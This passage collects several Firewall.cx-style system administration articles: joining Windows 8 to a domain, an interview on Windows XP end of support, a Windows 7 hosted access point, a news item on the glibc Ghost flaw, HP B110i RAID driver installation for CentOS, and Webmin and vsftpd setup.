Now, to add the workstation to the domain, open the System Properties of FW-CL1 by right-clicking on the This PC icon and selecting Properties:

windows-8-join-active-directory-2Figure 2. System Settings

Next, click the Advanced system settings option in the upper left corner. The System Properties dialog box will open. Select the Computer Name tab and then click on the Change… button to add this computer to the domain.

windows-8-join-active-directory-3Figure 3. System Properties

In the next window, select the Domain: option under the Member of section and type the company's domain name. In our lab, the domain name is set to firewall.local. When done, click on the OK button.

windows-8-join-active-directory-4Figure 4. Adding PC to Domain

The next step involves entering the details of a domain account that has permission to join the domain. This security measure ensures no one can easily join the domain without the necessary authority. Enter the domain credentials and click OK:

windows-8-join-active-directory-5Figure 5. Enter Domain Credentials

If the correct credentials were inserted, the PC becomes a member of the domain. A little welcome message will be displayed. Click OK and Restart the PC to complete the joining process:

windows-8-join-active-directory-6Figure 6. Member of Domain

The detailed operations that occur during a domain join can be found in the %systemroot%\debug\NETSETUP.LOG file.

At a higher level, when you join a computer in Active Directory, a Computer Account is created in the Active Directory database and is used to authenticate the computer to the domain controller every time it boots up.
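
As a side note, for scripted or repeated deployments the same join can also be performed from an elevated PowerShell prompt using the Add-Computer cmdlet; a minimal sketch using our lab's domain name (the FIREWALL\Administrator account is illustrative and you will be prompted for its password):

PS C:\> Add-Computer -DomainName "firewall.local" -Credential FIREWALL\Administrator -Restart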

 This completes our discussion on how to join a Windows 8 & Windows 8.1 Client to Windows Domain - Active Directory.


Microsoft Windows XP - End of Life / End of Support

A Q&A with Cristian Florian, Product Manager For GFI LanGuard On Security Implications & Planning Ahead

windows-xp-eosWith Windows XP End of Life & End of Support just around the corner (8th of April 2014), companies around the globe are trying to understand what the implications will be for their business continuity and daily operations, while IT Managers and Administrators (not all) are preparing to deal with the impact on users, applications and systems.

At the same time, Microsoft is actively encouraging businesses to migrate to their latest desktop operating system, Windows 8.

 

One could say it’s a strategy game well played on Microsoft’s behalf, bound to produce millions of dollars in revenue, but where does this leave companies who are requested to make the hard choice and migrate their users to newer operating systems?

Do companies really need to rush and upgrade to Windows 7 or 8/8.1 before the deadline? Or do we need to simply step back for a moment and take things slowly in order to avoid mistakes that could cost our companies thousands or millions of dollars?

Parallel to the above thoughts, you might find yourself asking whether software companies will continue to deliver support and security patches for their products; a question that might be of even greater significance for many companies.

To help provide some clear answers to the above, but also understand how companies are truly dealing with the Windows XP End of Life, Firewall.cx approached GFI’s LanGuard product manager, Cristian Florian, to ask some very interesting questions that will help us uncover what exactly is happening in the background… We are certain readers will find this interview extremely interesting and revealing….

Interview Questions

Hello Cristian and thank you for accepting Firewall.cx’s invitation to help demystify the implications of Windows XP End of Life and its true impact to companies around the globe.

Response:

Thank you. Windows XP’s End of Life is a huge event and could have a significant security impact this year. So it will be important for companies to know what the risks are and how to mitigate them.

 

Question 1
Is Microsoft the only company dropping support for Windows XP? Taking into consideration that Windows XP still holds over 29% of the global market share for desktop operating systems (Source: Wikipedia https://en.wikipedia.org/wiki/Usage_share_of_operating_systems Feb. 2014), how are software companies likely to respond? Are they likely to follow Microsoft’s tactic?
 
Response:
A good number of companies have committed to support Windows XP beyond Microsoft’s End of Life date, but eventually they will have to drop support too. Although still high, the market share for Windows XP is showing a constant decline and once the deadline is reached, it will not take long before companies realize that it is no longer viable to dedicate resources to support and retain compatibility with Windows XP.

Google said that Chrome support for Windows XP will continue until April 2015. Adobe, however, will release the last version of Adobe Reader and Acrobat that still supports Windows XP in May 2014.

Microsoft will continue to provide antimalware definition updates for Windows XP until July 2015, and all major antivirus vendors will continue to support Windows XP for a period of time. Some of them have stated that they will support it until 2017 or 2018. Antivirus support is important for XP but one note of caution is that antivirus alone does not offer full protection for an operating system. So while supporting Windows XP is commendable, vendors need to be careful that they do not offer a false sense of security that could backfire on them and hurt their reputation.

 

Question 2
GFI is a leader in Network Security Software, automating patching and vulnerability assessments for desktop & server operating systems. We would like to know how GFI will respond to Windows XP End of Life.
 
Response:
We are telling our customers and prospects that Windows XP will not be a safe operating system after April 8. As of this year, Windows XP systems now show up in GFI LanGuard’s dashboard as high security vulnerabilities for the network during vulnerability assessments.

We will continue to provide patch management support for Windows XP. For as long as customers use XP and vendors release updates compatible with the OS, we will do what we can to keep those systems updated and as secure as possible. What is important to note is that this is simply not enough. The necessary security updates for the operating system will no longer be available and these are crucial for the overall security of the system and the network.

A GFI LanGuard trial offers unlimited network discovery and can be used, free of charge, to track all Windows XP systems on the network. IT admins can use these reports to create a migration plan to a different operating system.

 

Question 3
Do IT Managers and Administrators really need to worry about security updates for their Windows XP operating system? Is there any alternative way to effectively protect their Windows XP operating systems?
 
Response:
If they have Windows XP systems, they should definitely be concerned.

In 2013 and the first quarter of 2014, Microsoft released 59 security bulletins for Windows XP, 31 of which are rated as critical. The National Vulnerability Database reported 88 vulnerabilities for Windows XP in 2013, 47 of them critical. A similar number of vulnerabilities is expected to be identified after April 8, but this time round, no patches will be available.

Part of the problem is due to the popularity of Windows XP. Because it is used so widely, it is a viable target for malware producers. It is highly probable that a number of exploits and known vulnerabilities have not been disclosed and will only be used after April 8 – when they know there won’t be any patch coming out of Microsoft.

There are only two options: either upgrade or retire the systems altogether. If they cannot be retired, they should be kept offline.

 
Question 4
What do you believe will be the biggest problem for those who choose to stay with Windows XP?
 
Response:
There are three problems that arise if these systems are still connected to the Internet. First, each system on its own will be a target and quite easily prone to attack. Second, and this is of greater concern, machines running XP can be used as gateways into the entire network. They are now the weakest link in the chain and can also be hijacked to spread spam and malware and act as a conduit for DDoS attacks.

Third, compliance. Companies that are using operating systems not supported by the manufacturer are no longer compliant with security regulations such as PCI DSS, HIPAA, PSN CoCo and others. They can face legal action and worse if the network is breached.

 

Question 5
GFI is well known in the IT Market for its security products and solutions. Your products are installed and trusted by hundreds and thousands of companies. Can you share with us what percentage of your customer database still runs the Windows XP operating system, even though we’ve got less than a month before its End of Life?
 
Response:
We have seen a marked decline in the number of XP users among our customers. A year ago, we were seeing up to 51% of machines using XP, with 41% having at least one XP system. Looking at the data this year, 17% are still using XP, with 36% having at least one Windows XP system.

 


Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

windows7-access-point-1-preNot many people are aware that Windows 7 has built-in capabilities that allow it to be transformed into a perfectly working access point so that wireless clients such as laptops, smartphones and others can connect to the local network or obtain Internet access. Turning a Windows 7 system into an access point is an extremely useful feature, especially when there is the need to connect other wireless devices to the Internet with no access point available.

When Windows 7 is configured to provide access point services, the operating system is fully functional and all system resources continue to be available to the user working on the system. In addition, the wireless network is encrypted using the WPA2 encryption algorithm.

Even though there are 3rd-party applications that will provide similar functionality, we believe this built-in feature is easy to configure and works well enough to make users think twice before purchasing such applications.

Windows 8 & 8.1 users can visit our article Configuring Windows 8 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point 

Creating Your Windows 7 Access Point

While there is no graphical interface that will magically turn Windows 7 into an access point, the configuration is performed via the CLI using one single command. We should note that when turning a Windows 7 station into a Wi-Fi access point, it is necessary to ensure the station’s wired network card (RJ45) is connected to the local network (LAN) and has Internet access. Wireless clients that connect to the Windows 7 AP will obtain Internet access via the workstation’s wired LAN connection and will be located on a different subnet.

To begin, click on the Start button and enter cmd.exe in the Search Programs and Files area as shown below:

windows7-access-point-1

Next, right click on cmd.exe and select Run as administrator from the menu. This will open a DOS prompt with administrator privileges, necessary to execute the CLI command.

As mentioned earlier, a single command is required to create the Windows 7 access point and here it is:

netsh wlan set hostednetwork mode=allow "ssid=myssid" "key=mykey" keyUsage=persistent

The only parameters that need to change in the above command are the ssid and key parameters. All the rest can be left as is. The ssid parameter configures the SSID that will be broadcast by the Windows 7 operating system, while the key parameter defines the WPA2-Personal key (password) that clients need to enter in order to connect to the Wi-Fi network.

Following is an example that creates a wireless network named Firewall.cx with a WPA2 password of $connect$here :

C:\Windows\system32> netsh wlan set hostednetwork mode=allow "ssid=Firewall.cx" "key=$connect$here" keyUsage=persistent

The hosted network mode has been set to allow.

The SSID of the hosted network has been successfully changed.

The user key passphrase of the hosted network has been successfully changed.

C:\Windows\system32>

When executed, the above command creates the required Microsoft Virtual WiFi Miniport adapter and sets up the hosted network. The new Microsoft Virtual WiFi Miniport adapter will be visible in the Network Connections panel as shown below. In our example the adapter is named Wireless Network Connection 2. Note that this is a one-time process and users will not need to create the adapter again:

windows7-access-point-2

The next step is to start the hosted wireless network. The command to start/stop the hosted network is netsh wlan start|stop hostednetwork and needs to be run as administrator. Simply run the command in the same DOS prompt previously used:

C:\Windows\system32>netsh wlan start hostednetwork

The hosted network started.

C:\Windows\system32>

Notice how our Wireless Network Connection 2 has changed status and is now showing our configured SSID Firewall.cx:

windows7-access-point-3

To stop the hosted network, repeat the above command with the stop parameter:

C:\Windows\system32>netsh wlan stop hostednetwork
The hosted network stopped.
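
At any time, the current state of the hosted network (status, channel, number of connected clients) can be verified with the show option of the same command:

C:\Windows\system32>netsh wlan show hostednetwork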

Starting The WLAN via Shortcuts – Making Life Easy

Users who frequently use the above commands can quickly create two shortcuts to start/stop the hosted network. 

To help save time and trouble, we've created the two shortcuts and made them available for download in our Administrator Utilities Download Section.  Simply download them and unzip the shortcuts directly on the desktop:

windows7-access-point-4

Double-clicking on each shortcut will start or stop the hosted network. Users experiencing problems starting or stopping the hosted network can right-click on the shortcuts and select Run as administrator.
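
If you prefer to create the scripts yourself, a pair of minimal batch files will do the same job; below is a hedged sketch of the start script (the stop script simply uses the stop keyword instead), with both run as administrator:

@echo off
rem start-ap.bat - illustrative name; starts the Windows 7 hosted network
netsh wlan start hostednetwork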

 

Enable Internet Connection Sharing  (ICS)

With our hosted network initiated, all that’s required is to enable Internet Connection Sharing on Windows 7. This will force our newly created hosted network (access point) to provide Internet and DHCP services to our wireless clients.

To enable Internet Connection Sharing, go to Control Panel > Network and Internet > Network and Sharing Center and select Change adapter settings from the left menu. Right-click on the computer’s LAN network adapter (usually Local Area Connection) and select Properties:

windows7-access-point-5

Next, select the Sharing tab and enable the Internet Connection Sharing option. Under Home networking connection select the newly created wireless network connection, in our example this was Wireless Network Connection 2, and untick Allow other network users to control or disable the shared Internet connection setting as shown below:

windows7-access-point-6

After clicking on OK to accept the changes, we can see that the Local Area Connection icon now has the shared status next to it, indicating this is now a shared connection:

windows7-access-point-7

At this point, our Windows 7 system has transformed into an access point and is ready to serve wireless clients!

Note: Users with Cisco VPN Client installed will experience problems (Error 442) when trying to connect to VPN networks after enabling ICS. To resolve this issue, simply visit our popular How To Fix Reason 442: Failed to Enable Virtual Adapter article.

Connecting Wireless Clients To Our Wi-Fi Network

Wireless clients can connect to the Windows 7 access point as they would with any normal access point. We connected successfully to our Windows 7 access point (SSID: Firewall.cx) without any problem, using a Samsung Galaxy S2 Android smartphone:

windows7-access-point-8

After successfully connecting and browsing the Internet from our android smartphone, we wanted to test this setup and see if using a Windows 7 system as an access point had any impact on wireless and Internet browsing performance.

Comparing Real Access Point Performance With A Windows 7 O/S Access Point

To test this out we used a Cisco 1041N access point, which was placed right next to our android smartphone and configured with an SSID of firewall. Both Windows 7 system and Cisco access point were connected to the same LAN network and shared the same Internet connection – a 10,000 Kbps DSL line (~10Mbps).

The screenshot below confirms our android smartphone had exceptional Wi-Fi signal with both access points:

windows7-access-point-9

Keep in mind, the Wi-Fi with SSID firewall belongs to the Cisco 1041N access point, while SSID Firewall.cx belongs to the Windows 7 access point.

We first connected to the Windows 7 access point and ran our tests. Maximum download speed was measured at 6,796Kbps, or around 6.6Mbps:

windows7-access-point-10

Next, we connected to our Cisco 1041N access point and performed the same tests. Maximum download speed was measured at 7,460Kbps, or 7.3Mbps:

windows7-access-point-11

There was a small difference in performance; however, the difference is so small that it is hard to notice unless you run these kinds of tests. In both cases, Internet access was smooth without any interruptions or problems.

Summary

Being able to transform a Windows 7 system into an access point is a handy and much welcomed feature. We’ve used this feature many times in order to overcome limitations where no access point was available and it worked just fine - every time.  Performance seems pretty solid despite the small, unnoticeable degradation in speed, which won’t affect anyone.

While this setup is not designed as a permanent access point solution, it can be used to get you out of difficult situations and can serve a small number of wireless clients without any problem.


Critical 15 Year-old Linux Security Hole (Ghost) Revealed

linux-ghost-security-gnu-lib-vulnerability-1Security researchers at qualys.com yesterday released information on a critical 15 year-old Linux security hole which affects millions of Linux systems dating back to the year 2000. The newly published security hole – code-named ‘Ghost’ – was revealed yesterday by Qualys' security team on openwall.com.

The security hole was found in the __nss_hostname_digits_dots() function of the GNU C Library (glibc).

The function is used on almost all networked Linux computers when the computer tries to access another networked computer, either by using the /etc/hosts file or, more commonly, by resolving a domain name with the Domain Name System (DNS).

As noted by the security team, the bug is reachable both locally and remotely via the gethostbyname*() functions, making it possible to exploit it remotely by triggering a buffer overflow with an invalid hostname argument passed to an application that performs DNS resolution.

The security hole exists in any Linux system that was built with glibc-2.2, which was released on November 10th, 2000. Qualys mentioned that the bug was patched on May 21st, 2013 in releases glibc-2.17 and glibc-2.18.

Linux systems that are considered vulnerable to the attack include RedHat Enterprise Linux 5, 6 and 7, CentOS 6 and 7, Ubuntu 12.04 and Debian 7 (Wheezy).

Debian is already patching its core systems (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776391), while Ubuntu has already patched its 12.04 and 10.04 distributions (https://www.ubuntu.com/usn/usn-2485-1/). CentOS patches are also on their way.
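
As a quick, hedged way to gauge exposure on RPM-based systems, you can check the installed glibc package and look for the GHOST fix (CVE-2015-0235) in its changelog; package versions and changelog wording will differ per distribution:

# rpm -q glibc
# rpm -q --changelog glibc | grep CVE-2015-0235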


Linux CentOS - Redhat EL Installation on HP Smart Array B110i SATA RAID Controller - HP ML/DL Servers

This article was written thanks to our recent encounter with an HP DL120 G7 rack mount server equipped with an HP Smart Array B110i SATA RAID controller, which needed to be installed with the Linux CentOS 6.0 operating system. The HP Smart Array B110i SATA RAID controller is found on a variety of HP servers, therefore this procedure can be applied to all HP servers equipped with the Smart Array B110i controller.

As with all articles, we have included step-by-step instructions for installing the HP Smart Array B110i SATA RAID controller drivers, including screenshots (from the server’s monitor) and the files, drivers and utilities that might be needed.

Provided Download Files:  HP Smart Array B110i Drivers (Redhat 6.0, CentOS 6.0), RawWrite & Win32DiskImager 

The HP SmartArray B110i Story

What was supposed to be a pretty straightforward process turned out to become a 3-hour troubleshooting session to figure out how to install the necessary Smart Array B110i drivers so that our CentOS 6.0 or Redhat Enterprise Linux 6.0 install process would recognize our RAID volumes and proceed with the installation of the operating system.

A quick search on Google revealed that we were not alone – hundreds of people seem to have struggled with the same issue long before we did. However, we couldn’t locate an answer that provided full instructions on how to deal with the problem, so we decided to create one that did!

Installation Steps

The first step is to enter the server’s BIOS and enable SATA RAID Support. This essentially enables the controller and allows RAID setup from within it. On the HP DL120 G7 this option was under the Advanced Options > Embedded SATA Configuration > Enable SATA RAID Support menu:

linux HP b110i installation

Next step is to save and exit the BIOS.  

While the server restarts, press F8 when prompted to enter the RAID Controller menu and create the necessary RAID and logical volumes. We created two logical drives in a RAID 0 configuration, with 9.3GB & 1.8TB capacity:

HP b110i logical drive configuration

Next, it was time to prepare the necessary driver disk so that the operating system can ‘see’ the RAID controller and the drives created. For this process, two things are needed:

  • Correct Disk Driver
  • Create Driver Diskette

Selecting The Correct Disk Driver

HP offers drivers for the B110i controller for a variety of operating systems, including Redhat and SUSE, both for Intel and AMD based CPU systems. The driver diskette image provides the binary driver modules pre-built for Linux, which enables the HP Smart Array B110i SATA RAID Controller. CentOS users can make use of the Redhat drivers without hesitation.

For this article we are providing as a direct download, drivers for RedHat Enterprise Linux & CentOS v6.0 for Intel and AMD 64bit processors (x86-64bit). These files are available at our Linux download section.

If a diskette driver for earlier or later systems is required, we advise visiting HP’s website and searching for the term “Driver Diskette for HP Smart Array B110i”, which will produce a good number of results for all operating systems.

Driver diskette file names have the format “hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz” where rhel represents the operating system (RedHat Enterprise Linux), 6u0 stands for update 0 (version 6, update 0 = 6.0) and x86_64 for the system architecture covering x86 platforms (Intel & AMD).

Writing Image To Floppy Disk Or USB Flash

The driver diskette must be uncompressed using a utility such as 7zip (freely available). Uncompressing the file reveals the file dd.img. This is the driver disk image that needs to be written to a floppy disk or USB flash drive.

Linux users can decompress and write the image in one step using the following command. Remember to substitute /dev/sdb with your USB or floppy drive:

# zcat hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz | dd of=/dev/sdb

Windows users can use RawWrite if they wish to write it to a floppy disk drive or Win32DiskImager to write it to a USB Flash. Both utilities are provided with our disk driver download. Since we had a USB floppy disk drive in hand, we selected RawWrite:

rawwrite usage and screenshot

Loading The Driver Diskette

With the driver diskette ready, it’s time to begin the CentOS installation, by booting from the DVD:

centos 6.0 welcome installation

At the installation menu, hit ESC to reach the boot: prompt. At the prompt, enter the following command: linux dd blacklist=ahci and hit enter to begin installation as shown below:

centos 6 initrd.img driver installation

The initial screen of the installation GUI will allow you to load the driver diskette created. At the question, select Yes and hit enter:

linux-b110i-installation-6

The next screen instructs you to insert the driver disk into /dev/sda and press OK. The location /dev/sda refers to our USB floppy drive, connected to one of our HP server's USB ports during bootup:

linux-b110i-installation-7

The system will present a screen with the message Reading driver disk, indicating the driver is loading and once complete, the message detecting hardware … waiting for hardware to initialize… will appear:

linux-b110i-installation-8

Finally, the installation procedure asks if you wish to load any more driver disks. We answered No and the installation procedure continued as expected. We saw both logical disks and were able to successfully install and use them without any problem:

linux centos logical drive setup

We hope this brief article will help thousands of engineers around the world save a bit of their valuable time!


Installing & Configuring Linux Webmin - Linux Web-Based Administration

For many engineers and administrators,  maintaining a Linux system can be a daunting task, especially if there’s limited time or experience.  Working in shell mode, editing files, restarting services, performing installations, configuring scheduled jobs (Cron Jobs) and much more, requires time, knowledge and patience.

One of the biggest challenges for people who are new to Linux is to work with the operating system in an easy and manageable way, without needing to know all the commands and file paths in order to get the job done.

All this has now changed, and you can now do all the above, plus a lot more, with a few simple clicks through an easy-to-follow web interface.  Sounds too good to be true?  Believe it or not, it is true!  It's time to get introduced to ‘Webmin’.

Webmin is a freeware program that provides a web-based interface for system administration and configuration. One of Webmin's strongest points is that it is modular, which means there are hundreds of extra modules/addons that can be installed to provide the ability to control additional programs or services someone might want to install on their Linux system.

Here are just a few of the features supported by Webmin, out of the box:

  • Setup and administer user accounts
  • Setup and administer groups
  • Setup and configure DNS services
  • Configure file sharing & related services (Samba)
  • Setup your Internet connection (including ADSL router, modem etc)
  • Configure your Apache webserver
  • Configure a FTP Server
  • Setup and configure an email server
  • Configure Cron Jobs
  • Mount, dismount and administer volumes, hdd's and partitions
  • Setup system quotas for your users
  • Built-in file manager
  • Manage an OpenLDAP server
  • Setup and configure VPN clients
  • Setup and configure a DHCP Server
  • Configure a SSH Server
  • Setup and configure a Linux Proxy server (squid) with all supported options
  • Setup and configure a Linux Firewall
  • and much much more!!!

The great part is that webmin is supported on all Linux platforms and is extremely easy to install.  While our example is based on Webmin's installation on a Fedora 16 server using the RPM package, these steps will also work on other versions such as Red Hat, CentOS and other Linux distributions.

Before we dive into Webmin, let's take a quick look at what we've got covered:

  • Webmin Installation
  • Adding Users, Groups and Assigning Privileges
  • Listing and Working with File Systems on the System
  • Creating and Editing Disk Quotas for Unix Users
  • Editing the System Boot up, Adding and Removing Services
  • Managing and Examining System Log Files
  • Setting up and Changing System Timezone and Date
  • Managing DNS Server & Domain
  • Configuring DHCP Server and Options
  • Configuring FTP Server and Users/Groups
  • How to Schedule a Backup
  • Configuring CRON Jobs with Webmin
  • Configuring SSH Server with Webmin
  • Configuring Squid Proxy Server
  • Configuring Apache HTTP Server

Installing Webmin On Linux Fedora / Redhat / CentOS

Download the required RPM file from http://download.webmin.com/download/yum/ using the command (note the root status):

# wget http://download.webmin.com/download/yum/webmin-1.580-1.noarch.rpm

Install the RPM file of Webmin with the following command:

# rpm -Uvh webmin-1.580-1.noarch.rpm

Start Webmin service using the command:

# systemctl start webmin.service

You can now log in to https://Fedora-16:10000/ as root with your root password. To ensure you are able to log in to your Webmin administration interface, simply use the following URL: https://your-linux-ip:10000 , where "your-linux-ip" is your Linux server's or workstation's IP address.
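
If the login page does not load, a host firewall may be blocking TCP port 10000; the following is a hedged example of temporarily opening the port with iptables (rule position depends on your existing ruleset, and the rule must be saved with your distribution's mechanism to survive a reboot):

# iptables -I INPUT -p tcp --dport 10000 -j ACCEPT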

Running Webmin

Open Firefox or any other browser, and type the URL https://Fedora-16:10000/ :

linux-webmin-1

 

You will be greeted with a welcome screen. Login as root with your root password. Once you are logged in, you should see the system information:

linux-webmin-2

Adding Users, Groups And Assigning Them Privileges

Expand the "System" Tab in the left column index, and select the last entry “Users and Groups”.  You will be shown the list of the "Local Users" on the system:

linux-webmin-3

You can add users or delete them from this window. If you want to change the parameters of any user, you can do so. By clicking on any user, you can see the groups and privileges assigned to them. These can be changed as you like. For example, if you select the user "root", you can see all the details of the user as shown below :

linux-webmin-4

By selecting the adjacent tab in the "Users and Groups" window, you can see the "Local Groups" as well:

linux-webmin-5

Here, you can see the members in each group by selecting that group. You can delete a group or add a new one. You can select who will be the member of the group, and who can be removed from a group. For example, you can see all the members in the group "mem", if you select and open it:

linux-webmin-6

Here, you will be allowed to create a new group or delete selected groups. You can also add users to the groups or remove them as required. If required, you can also change the group ID on files and modify a group in other modules as well.

Listing And Working With File Systems On The System

By selecting "Disk and Network Filesystems" under the "System" tab on the left index, you can see the different file systems currently mounted.

linux-webmin-7

You can select other type of file system you would like to mount. Select it from the drop down menus as shown:

linux-webmin-8

By selecting a mounted file system, you can edit its details, such as whether it should be mounted at boot time, whether it should remain mounted or be unmounted now, and whether the file system should be checked at boot time. Mount options like read-only, executable and permissions can also be set here.

Creating And Editing Disk Quotas For Unix Users

Prior to Linux installation, a key point when partitioning is the /home directory.

Most control-panel-based setups are built around /home, since Users & Groups, the FTP server, user shells, Apache virtual hosts and several other services keep their data there. Therefore, /home should be created as a Logical Volume on a native Linux file system (ext3). Here it is assumed there is already a /home partition on the system.

You can set the quotas by selecting “Disk & Network Filesystems” under “System”:

linux-webmin-9

This allows you to create and edit disk quotas for the users in your /home partition or directory. Each user is given a certain amount of disk space they can use. Approaching the quota limit will generally trigger a warning.

You can also edit other mounts such as the root directory "/" and also set a number of presented mount options:

linux-webmin-10

Editing The System Boot Up, Adding And Removing Services

All Systemd services are neatly listed in the "Bootup and Shutdown" section within "System":

linux-webmin-11

All service related functions such as start, stop, restart, start on boot, disable on boot, start now and on boot, and disable now and on boot are available at the bottom of the screen. This makes system bootup process modification a breeze, even for the less experienced:

linux-webmin-12

 The "Reboot System" and "Shutdown System" function buttons are also located at the bottom, allowing the immediately reboot or shutdown the system.

Managing And Examining System Log Files

Who would have thought managing system log files in Linux would be so easy? Webmin provides a dedicated section allowing the administrator to make a number of changes to the preferences of each system log file. The friendly interface will show you all available system log files and their location. By clicking on the one of interest, you can see its properties and make the changes you require.

The following screenshot shows the "System Logs" listed in the index under "System" menu option:

linux-webmin-13

All the logs are available for viewing and editing. The screenshot below shows an example of editing the maillog. Through the interface, you can enable or disable logs and make a number of other changes on the fly:

linux-webmin-14

Another entry under "System" is the important function of "Log File Rotation". This allows you to edit which log file you would like to rotate and how (daily, weekly or monthly). You can define what command will be executed after the log rotation is done. You can also delete the selected log rotations:

linux-webmin-15

Log rotation is very important, especially on a busy system as it will ensure the log files are kept to a reasonable and manageable size.

Setting Up And Changing System Timezone/Date

Webmin also supports setting up system time and date. To do so, you will have to go to "System Time" under "Hardware" in the main menu index.

linux-webmin-16

System time and hardware time can be separately set and saved. These can be made to match if required.

On the next tab you will be able to change the Timezone:

linux-webmin-17

The next tab is the 'Time Server Sync', used for synchronizing to a time-server. This will ensure your system is always in sync with the selected time-server:

linux-webmin-18

Here, you will be able to select a specific timeserver with a hostname or address and set the schedule when the periodic synchronizing will be done.

Managing DNS Server & Domain

DNS Server configuration is possible from the "Hostname and DNS Client", which is located under "Networking Configuration" within "Networking" in the index:

linux-webmin-19

Here you can set the Hostname of the machine, the IP Address of the DNS Servers and their search domains and save them.

Configuring DHCP Server And Options

For configuration of your system's DHCP server, go to “DHCP Server” within “System and Server Status” under “Others”:

linux-webmin-20

All parameters related to DHCP server can be set here:

linux-webmin-21

Configuring FTP Server And Users/Groups

For ProFTPD Server, select “ ProFTPD Server” under “Servers”. You will see the main menu for ProFTPD server:

linux-webmin-22

You can see and edit the Denied FTP Users if you select the "Denied FTP Users":

linux-webmin-23

The configuration file at /etc/proftpd.conf can be edited directly by selecting "Edit Config Files" in the main menu:

linux-webmin-24

How To Schedule A Backup

Backing up, scheduling backups of, and restoring configuration files can all be done from “Backup Configuration Files” under “Webmin”.

In the “Backup Now” window, you can set the modules, the backup destination, and what you want included in the backup. The backup can be a local file on the system, a file on an FTP server, or a file on an SSH server. For both server types, you will have to provide the username and password. Anything else that you would like to include in the backup, such as Webmin module configuration files, server configuration files, or other listed files, can also be specified here:

linux-webmin-25

If you want to schedule your backups, go to the next tab, “Scheduled Backups”, and select “Add a new scheduled backup”; as shown, no scheduled backup has been defined yet:

linux-webmin-26

 

linux-webmin-27

Here you set the exact backup schedule options. The information is nearly the same as for Backup Now; however, you now also have the choice of setting schedule options such as Months, Weekdays, Days, Hours, Minutes and Seconds.

linux-webmin-28

 Restoration of modules can be selected from the “Restore Now” tab:

linux-webmin-29

The options for restore now follow the same pattern as for the backup. You have the options for restoring from a local file, an FTP server, an SSH server, and an uploaded file. Apart from providing the username and passwords for the servers, you have the option of only viewing what is going to be restored, without applying the changes.

Configuring CRON Jobs With Webmin

Selecting the “Scheduled Cron Jobs” under “System” will allow creation, deletion, disabling and enabling of Cron jobs, as well as controlling user access to cron jobs. The interface also shows the users who are active and their current cron-jobs. The jobs can be selectively deleted, disabled or enabled (if disabled earlier).

linux-webmin-30

For creating a new cron job and scheduling it, select the tab “Create a new scheduled cron job”. You have the options of setting the Months, Weekdays, Days, Hours, Minutes. You have the option of running the job on any date, or running it only between two fixed dates:

linux-webmin-31

For controlling access to Cron jobs, select the next tab “Control User Access to Cron Jobs” in the main menu:

linux-webmin-32

Configuring SSH Server With Webmin

Selecting “SSH Server” under “Servers” will allow all configuration of the SSH Server:

linux-webmin-33

Access Control is provided by selecting the option "Access Control" from the main menu :

linux-webmin-34

Miscellaneous options are available when the "Miscellaneous Options" is selected from the main menu:

linux-webmin-35

The SSH config files can be accessed directly and edited by selecting “Edit Config Files” from the main menu.

linux-webmin-36

Configuring Squid Proxy Server

Select “Squid Proxy Server” under “Servers”. The main menu shows what can be controlled there:

linux-webmin-37

Selecting “Access Control” provides access to ACLs, proxy restrictions, ICP restrictions, external ACL programs, and reply proxy restrictions:

linux-webmin-38

 

linux-webmin-39

Configuring Apache HTTP Server

You can configure “Apache Webserver” under “Servers”. The main menu shows what you can configure there.

All Global configuration can be done from the first tab:

linux-webmin-40

You can also configure the existing virtual hosts or create a virtual host, if you select the other tabs:

linux-webmin-41

Users and Groups who are allowed to run Apache are mentioned here (select from the main menu):

linux-webmin-42

Apache configuration files can be directly edited from the main menu.

All the configuration files, httpd.conf, sarg.conf, squid.conf, and welcome.conf can be directly edited from this interface:

linux-webmin-43

Any other service or application which you are not able to locate directly in the index on the left can be found by entering its name in the search box on the left. If the searched item is not installed, Webmin will offer to download the RPM and install it. A corresponding entry will appear in the index on the left and you can proceed to configure the service or application. After installing an application or service, modules can be refreshed as well. From the Webmin interface, you can also view the module's logs.


Installing & Configuring VSFTPD FTP Server for Redhat Enterprise Linux, CentOS & Fedora

Vsftpd is a popular FTP server for Unix/Linux systems. For those unaware of the vsftpd FTP server, note that this is not just another FTP server, but a mature product that has been around for over 12 years in the Unix world. While vsftpd is found as an installation option on many Linux distributions, Linux system administrators rarely find clear installation and configuration instructions for it, which is the reason we decided to cover it on Firewall.cx.

This article focuses on the installation and setup of the Vsftpd service on Linux Redhat Enterprise, Fedora and CentOS, however it is applicable to almost all other Linux distributions.  We'll also take a look at a number of great tips which include setting quotas, restricting access to anonymous users, disabling uploads, setting a dedicated partition for the FTP service, configuring the system's IPTable firewall and much more.

VSFTPD Features

Following is a list of vsftpd's features which confirms this small FTP package is capable of delivering a lot more than most FTP servers out there:

  • Virtual IP configurations
  • Virtual users
  • Standalone or inetd operation
  • Powerful per-user configurability
  • Bandwidth throttling
  • Per-source-IP configurability
  • Per-source-IP limits
  • IPv6
  • Encryption support through SSL integration
  • and much more....!

Installing The VSFTPD Linux Server

To initiate the installation of the vsftpd package, simply open your CLI prompt and use the yum command (you need root privileges) as shown below:

# yum install vsftpd

Yum will automatically locate, download and install the latest vsftpd version.

Configure VSFTPD Server

To open the configuration file, type:

# vi /etc/vsftpd/vsftpd.conf

Turn off standard ftpd xferlog log format and turn on verbose vsftpd log format by making the following changes in the vsftpd.conf file:

xferlog_std_format=NO
log_ftp_protocol=YES
Note: the default vsftpd log file is /var/log/vsftpd.log.

The above two directives will enable logging of all FTP transactions.

To lock down users to their home directories:

chroot_local_user=YES

You can create warning banners for all FTP users, by defining the path:

banner_file=/etc/vsftpd/issue

Now you can create the /etc/vsftpd/issue file with a message compliant with the local site policy or a legal disclaimer:

“NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address”.
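The banner file itself can be created straight from the shell; a quick sketch using the message above:

# echo "NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address" > /etc/vsftpd/issue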

Turn On VSFTPD Service

Turn on vsftpd on boot:

# systemctl enable vsftpd.service

Start the service:

# systemctl start vsftpd.service

You can verify the service is running and listening on the correct port using the following command:

# netstat -tulpn | grep :21

Here's the expected output:

tcp   0   0 0.0.0.0:21   0.0.0.0:*   LISTEN   9734/vsftpd

Configure IPtables To Protect The FTP Server

